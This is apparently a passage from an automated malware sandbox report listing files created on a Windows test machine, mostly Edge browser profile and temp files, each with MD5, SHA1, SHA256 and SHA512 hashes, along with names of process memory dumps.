| SHA512 | 3cf9e14405dc18a25e8aef2da0926827afca38992e7461509494e44913b198c4cfcd1debe8a8ba5de34566f3a1eb5a38ce2ef300ffa0f8464b265659d7fd51f4 |
C:\Users\Admin\AppData\Local\Temp\tmpB1BA.tmp
| MD5 | 2f91c460fd9a0e677f5fc7841af66732 |
| SHA1 | c4c1bca313423432b93cf9465859ba504cc767c7 |
| SHA256 | 38b4e0d8c902db10f5e456a58635b7d807383981bcfb05582a50d983858364c8 |
| SHA512 | bd545cc7ff6e8fca07fd54f0bb0636b611ff2634c4f1e552becb586955a4b02af3bb2c279c496a5e603dc5d92b3aaeed556307f663b1958e22c0fcb829d71c4a |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2cvo11a.4yi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\tmpB135.tmp
| MD5 | 349e6eb110e34a08924d92f6b334801d |
| SHA1 | bdfb289daff51890cc71697b6322aa4b35ec9169 |
| SHA256 | c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a |
| SHA512 | 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574 |
C:\Users\Admin\AppData\Local\Temp\tmpB243.tmp
| MD5 | d367ddfda80fdcf578726bc3b0bc3e3c |
| SHA1 | 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671 |
| SHA256 | 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0 |
| SHA512 | 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2d707370b21a46782e7939659be0bf9f |
| SHA1 | 04204efac06b432f43d7e972adbccfdc51994646 |
| SHA256 | 811d270aece97b092d6e23e78bbeb2498389d6394fdf7d87a294d5a725b965a2 |
| SHA512 | 2bb2c330463a1e4e1e6ce2311c2ab46dcbfcac71b30fd094005b43ec622ecb6ea72877642f7500786e42f50897dd98239a2eea087b75ff0fc5eeeda916c25c0c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\8c787ecb-bd7d-49cc-af80-13738ce63207\index-dir\the-real-index~RFe58d414.TMP
| MD5 | 351f403911e7f0d3e427c8943548a27d |
| SHA1 | 401fc159ea5b97a6ce95cd71463a9b6d9be56b33 |
| SHA256 | e0238a99de7674c7b9dcb8e60caa949794f6ca9d8584e8955b9477e4d422c405 |
| SHA512 | 0dbf4a45567e9d3e0b1d73084de398971b0dbb048991a241914fcf5c939846d3e82392995cb1311b6e4e1c0f866f9a57767ec969d7ade20e584b44353585abb5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\8c787ecb-bd7d-49cc-af80-13738ce63207\index-dir\the-real-index
| MD5 | 0f199f992b92fcb22f5f70d58b887e8e |
| SHA1 | c0806d490d9b5e236475da288d48defa1cead6dc |
| SHA256 | 795137f4b2803064b03fcccf62005bb98bce4e0d97de99fd5a54cff5b01af08f |
| SHA512 | bd6b8316df4fdec51190eb9d19b867df4d8ab8f1c44f7deb46a1cda604025f4eac3c8c96da3cee42612591afdaebea4058eb117daf023142ca8e0af3f1f340d3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\a171c84f-f9b5-4b6f-b169-da2361cbb23f\index-dir\the-real-index
| MD5 | 22f7c87d13a49ffa717c9f04343b0b1e |
| SHA1 | 7d87ac8bc6db894428e0538d1d9845b829faeb42 |
| SHA256 | 59aa32ab8c556baeb0706fa9a8cc80c0837babcf33053543df49ce7a04049277 |
| SHA512 | 2163d7dc303f829d07a83af67507e356465ddddb04fb35aef0f69e76868fbd1c664eb4a980f4615ef3c8aafa3c7402db507774ee30349fa5e2d46c457477f317 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\a171c84f-f9b5-4b6f-b169-da2361cbb23f\index-dir\the-real-index~RFe58d81b.TMP
| MD5 | b2c15924bd2c3f54fe1b1a98d0608f00 |
| SHA1 | 732bdca53b4f207b75dc8b2156b6cc12e3d30d62 |
| SHA256 | 1e14fd6f4a3a7dfde8144788d310d7c70f672f2afac1b50ccaee1ea1adb061e9 |
| SHA512 | 2461a4b4544b304f5b95938ae5f33de6b8c1210f046f538f91e422e301a6f21eaa88f6352c04fdb192b6821b50b54a229079371fd16337c01e09c5410d3d1b11 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt
| MD5 | e737ca262c3231e5c7d173bcc17cda5d |
| SHA1 | 869d378cf34a509d90a61a73468be8e74bc05531 |
| SHA256 | feb85976ea45e3d3e1bf251bb73d987c0a212421d706cc552bd99dd9a5eb4c1b |
| SHA512 | f1a42403afaddbcd244149df42e484dc5d9a0e3780067bfe1379997b1218b436c2eb6ff221875ad23131e0750e5b8a4bed1a573bb9562b3f54928ac2ffe06a8b |
memory/6200-1291-0x00007FF717FC0000-0x00007FF718561000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 1258bab0ea472ab153644185a4c8b5e1 |
| SHA1 | b90aff7006807400397155e2ad2366b3e214deae |
| SHA256 | 8e495c12eb982a63da01004cd2d00068c50b09a42dbdcf07357f4e8f23b04467 |
| SHA512 | 771d48c1e9a0faa7fa1495d62afbc9779b774e712da4a894c339c561aceb5691450c6ba8db1aa1fbb1dd54ac022dac0ba408510acd8c63473a3fe3f6d84db943 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fea050bae25b93e4aac967c624c6a2ce |
| SHA1 | 44024a90e5fd7253a9d67ebe21918f1baeb9e0a3 |
| SHA256 | c69d75203e13810440112990ee466be1a9ad519a1ec29c7edd1483ea0892353e |
| SHA512 | 5aea14f62407951019f4d90549654bab82007856f424ec08aca0adc303d38b0be4bdfcb679fd3583af3372187544d0b9cddcafc1f406ae9f3ce539af28c42aba |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 18ce0948a4814738bc7543daf756b9b2 |
| SHA1 | fbf6b06895301f3db01f52324440deef75d3bc39 |
| SHA256 | f8a2ce6cfe20cc8a2ce2a1361a56c498485771ce69b6f60749ea3832714ea1ec |
| SHA512 | 88474eb07346b1e430f0baa8ae0405d355c219311f2d2b69a94c092827f586c1b7248b5f51e5bf82d911ab09df2694a17ea6432084ec25706a3c93f706474ff8 |
memory/6156-1472-0x0000000000BC0000-0x0000000000BFC000-memory.dmp
memory/7088-1473-0x00007FF68F5F0000-0x00007FF68FF56000-memory.dmp
memory/1468-1576-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/3456-1585-0x0000000000400000-0x0000000000965000-memory.dmp
memory/6260-1587-0x0000000000400000-0x00000000004CF000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 03bb99fa5aa995be0ecef71e9ba45da5 |
| SHA1 | a8a427d417bbf4d81c680fb99778b944fcaa7c64 |
| SHA256 | 2f6b02df4ee6c72702f6d894b00de0eba5961cb71317afa1114801503f489101 |
| SHA512 | b62c8be1026527175c1f49c9015c12d3c7749b0525ebdeb72b3044bc8531e455be9bcc00cbb06a742b528716b60cfe616a7817f5962664b51fef61115f951a1a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 37283b22aa2ab3e572b288a4d3e9b59e |
| SHA1 | 76ed04e5c29334a0aad5c0029660634318229758 |
| SHA256 | 02fe1287d0bcda1f1e7aee7c12d6f9fa8bc5653389cd9e2b2737ae12103c34e4 |
| SHA512 | ad1da00685e8c2819de8ad53552c0c729df75bd675c56d7d6ce8055586fa388cda682a4b6231505255425f83a57b6f977c852849538f610b6efd37fcac879d6e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | a724105a5f4994f678f11af5d8d3a6dd |
| SHA1 | d85011c44f98f52f35691d64c83582ea40bb7432 |
| SHA256 | d844fe8ab83a1575ceae8b1d87a220017a42162d6a1df371a0f14b097aba9056 |
| SHA512 | bb78028d99f0b36d5176d3ba42f2effc03ee83ab312c0c1c0217896c411b44280a0096c279788df7be89eb97310707d2466311278e69d95caced977932da36ce |
memory/7072-1638-0x0000000000400000-0x00000000007C8000-memory.dmp
memory/2872-1658-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/3152-1659-0x00007FF6FF510000-0x00007FF6FFAB1000-memory.dmp
memory/912-1660-0x0000000000400000-0x0000000000D1B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata
| MD5 | de902f8ad4ecf11dfec471828fc949ae |
| SHA1 | e1a09bef881ed1277ce69e23e889dbb627249d25 |
| SHA256 | f0604e72cd3db6c460978d66c3f495868ded02613acb75ab31e7f55c081a276b |
| SHA512 | acc91a2cdc1f926ef622047c4bff283f423f756152b09c164e5462dfcaa112ca7381935d93692b89c6680d3ed4864ab9768f5f804009056a9bf558b7f3a198ac |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\1af721b7-f375-437e-be43-c2aa523a78c1.dmp
| MD5 | 059b809b8009a655b9b4751658cf1b72 |
| SHA1 | eeb3a9316f7f33d702d6d2f8fb0e4c421fb6e1d2 |
| SHA256 | 3aaec8b47622535429fe78f71e4ee720769cf45f406330d4955649e7b9abf370 |
| SHA512 | 1d67ceed5cc3353726c85ba0599499c51008d723a43a151b1180c0d18c25c7b2af1b6cccf9e428cdbb9c255cf8e818ab97f962dc6550a8b302d5f26d763f3aa0 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 8e2bf8f9d9741231a24501887fead9b3 |
| SHA1 | 05caec3720fd1c10039ee6263296405626c2b1aa |
| SHA256 | 64400585ee0a77636ca1f16df8eb32c7bd7af8c1ced512ffcd49faf84ac4f08d |
| SHA512 | d6e50c5fbf68c86c35a62da61f50a411d03ab82a4adc9df030ceba5ab12f353bf3c0283974859a02a2814bee3b2aca04023a12f5a96d2c3120baa53b715b6a51 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6fef559582c77f3afc8378bbf6f1b37b |
| SHA1 | 65a2f3236308a8dcec8823936e99f053eaaee975 |
| SHA256 | dd4231c5f5744c8eac79b5e357cecced4c3c2ed6dbbfda433bef2c96a7f5c242 |
| SHA512 | 99ef021b9725ed24b6a174560c113498273d6d4726358308a8d50456b7ccba1f778a9e7dd92f99a6dc1e54503e56e1867f0155862572af1d1f719d59efce9f9f |